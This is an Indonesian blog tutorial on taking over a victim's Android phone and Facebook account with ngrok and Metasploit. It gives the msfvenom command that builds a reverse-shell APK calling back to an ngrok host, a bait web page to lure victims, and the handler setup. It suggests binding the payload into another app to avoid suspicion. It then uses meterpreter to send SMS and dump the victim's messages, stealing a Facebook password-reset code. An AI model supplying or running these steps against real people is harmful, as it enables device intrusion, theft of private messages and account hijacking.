Hack Android + Akun Facebook (Menggunakan Ngrok + Metasploit)

Hack Android + Akun Facebook (Menggunakan Ngrok + Metasploit)

Kali ini kita akan mencoba melakukan penetration testing ke sebuah hp android, menggunakan Ngrok + metasploit.

Disini kita akan menggunakan bait (umpan) file apk (aplikasi untuk android), yang kita letakkan pada sebuah link website.

tentu saja website disini adalah website contoh, pada penerapannya, sobat bisa mengembangkannya sendiri.

pertama, kita aktifkan terlebih dahulu service apache, buka terminal dan ketikkan:

$ sudo service apache2 start

selanjutnya kita akan menggunakan multi tunnel dari ngrok, untuk bisa menggunakan multi tunnel dari ngrok, kita harus lakukan edit file "ngrok.yml".
masuk ke folder instalasi ngrok, dan cari file "ngrok.yml". editing file bisa menggunakan leafpad, atau teks editor lainnya.

tambahkan baris konfigurasi seperti yang dicontohkan berikut:

kemudian simpan dan tutup file ngrok.yml tersebut.

langkah berikutnya adalah mengaktifkan multi tunnel ngrok.

buka new terminal dan ketikkan:

$ ./ngrok start -all

akan ditampilkan dua protocol aktif dari ngrok, sesuai dengan konfigurasi yang kita tambahkan sebelumnya.

Pada gambar tersebut diatas, yang harus kita perhatikan adalah link forwading tcp nya:
0.tcp.ngrok.io

dan port tcp nya:
10239

ini harus dicatat, dan berguna untuk pe,mbuatan file venom nanti.
masing-masing link dan port tersebut berbeda pada komputer sobat masing-masing.

berikutnya, kita akan membuat file venom, buka terminal baru dengan akses root, dan ketikkan:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10239 R > /var/www/html/codet.apk

catatan:
teks dengan warna merah adalah link dan port yang kita catat sebelumnya dari link tcp ngrok.

/var/www/html/codet.apk = adalah nama file (codet.apk) dengan folder lokasi simpan /"var/www/html"

berikutnya, masih pada terminal yang sama, masuk ke dalam folder penyimpanan "codet.apk" yang dibentuk tadi:

# cd /var/www/html/

di dalam folder ini, kita akan menemukan satu file yang bernama "index.htm".

edit file "index.html" menggunakan teks editor atau sejenis nya.

# leafpad index.html

disini saya menambahkan link umpan (codet.apk) di dalam badan web antara <body> dan </body>
silahkan sobat modifikasi sendiri untuk peletakkan link umpan ini.

disini saya mencontohkannya sebagai berikut:

Sehingga tampilan index.html nya menjadi seperti berikut:

langkah berikutnya adalah menyiapkan handler dari venom yang dibuat tadi (codet.apk).
buka terminal, dan ketikkan:

# msfconsole

setelah masuk msfconsole, ketikkan perintah berikut:

msf5> use exploit/multi/handler

kemudian kita akan diarahkan masuk ke dalam exploit(multi/handler).

Disini kita akan lakukan set payload:

msf5> exploit(multi/handler) set payload android/meterpreter/reverse_tcp

set LHOST:

msf5> exploit(multi/handler) set LHOST 127.0.0.1

set LPORT:

msf5> exploit(multi/handler) set LPORT 4444

catatan:
port 4444 ini disesuaikan dengan link tcp forward yang aktif dari ngrok

kemudian jalankan exploit handler ini

msf5> exploit(multi/handler) exploit

sekarang handler nya telah aktif, dan menunggu dari victim (korban) mengambil umpan yang berada di website (codet.apk)

beralih ke terminal ngrok yang telah aktif sebelumnya, disini kita melihat ada link forward http (port80) dari ngrok.

link ini adalah link tempat target masuk untuk mengambil umpan. siapa saja yang mengakses link ini akan dibelokkan ke komputer kita dari tunnel ngrok.

beralih ke sisi hp android korban, dimana korban mengakses link tersebut:

keterangan:
1. link website yang dibelokkan ke komputer kita
2. link file codet.apk

sebenarnya, sebatas ini kita telah bisa mengakses hp android korban, jika sebelumnya kita telah menanamkan script BeEF pada index.html ini.

hanya saja disini, kita akan mencobanya dengan cara lain, yaitu dengan menggunakan file apk. yang harus diingat, file codet.apk ini hanya mentahan venom, selanjutnya sobat bisa melakukannya dengan bind ataupun inject dengan aplikasi lain. misalnya "rar.apk + codet.apk" sehingga aplikasi ini tidak terlalu mencurigakan.

baik, berikutnya adalah dimana korban mendownload dan menginstall aplikasi umpan ini (codet.apk).
pada terminal ngrok yang aktif, akan terlihat bahwa korban telah mendownload file tersebut.

Setelah korban menginstal file umpan, dan menjalankannya, maka meterpreter handler kita akan terhubung langsung dengan hp adnroid korban. Bisa dilihat dari terminal msfconsole.

lakukan beberapa uji command pada meterpreter ini, misalkan:
untuk mengetahui system informasi yang digunakan dari hp korban:

meterpreter > sysinfo

Jika kita berhasil masuk ke dalam hp andorid korban ini, berikutnya kita akan mencoba mengambil alih akun facebooknya,

umumnya, untuk login ke facebook, ada 3 cara, yaitu : nama user, email, dan nomor telephone.

kita coba dengan login menggunakan nomor telephone.

tapi kita belum mengetahui nomor telephone yang digunakan oleh target, untuk itu kita coba dengan menggunakan fasilitas sms dari hp korban ke nomor yang sudah kita siapkan.

pada meterpreter, ketikkan command kirim sms berikut:

meterpreter > send_sms - d (nomor_hp_tujuan) -t (isi_pesan)

dengan cara ini, kita bisa mengetahui nomor telephone korban. sekarang kita lakukan test login ke facebook menggunakan nomor telephone tersebut.

tentu saja kita tidak bisa masuk, karena memang tidak memiliki akses ke dalamnya. selanjutnya kita akan mencoba fasilitas "lupa kata sandi" milik facebook.

ketika menggunakan fasilitas "lupa kata sandi", dan selanjutnya ditampilkan gambar seperti berikut, kita bisa melanjutkan ke langkah berikutnya, namun jika tidak, kita bisa menggunakan opsi lain.

Kebetulan pada contoh ini, nomor telephone tersebut bisa digunakan untuk fasilitas "lupa kata sandi" facebook.

facebook akan mengirimkan sms ke nomor tersebut, yang berisikan kode huruf ataupun angka, yang bisa digunakan untuk masuk kedalam id facebook.

beralih kembali ke meterpreter, sekarang kita akan mengambil semua sms dari hp android korban.
dan ketikkan perintah:

meterpreter > dump_sms

 lokasi simpan file sms yang di dump (download) tadi masuk ke folder dimana kita meletakkan "codet.apk" tadi, yaitu pada folder "/var/www/html/" dengan file yang berekstension ".txt"

buka file tersebut, dan cari sms yang paling terakhir masuk. (sms dari facebook). disana kita akan menemukan kode "lupa kata sandi" yang bisa digunakan untuk masuk ke akun facebook tadi.

beralih kembali ke browser, dimana tadi form isian kode "lupa kata sandi" masih terbuka.

masukkan kode yang di dapat dari sms, ke dalam form isian tersebut. dan....

kita sudah bisa mengakses akun facebook dari hp android korban.

untuk lebih jelasnya, silahkan simak videonya di channel youtube ini, durasi 10 menit 24 detik.

selamat mencoba, semoga bermanfaat. terimakasih.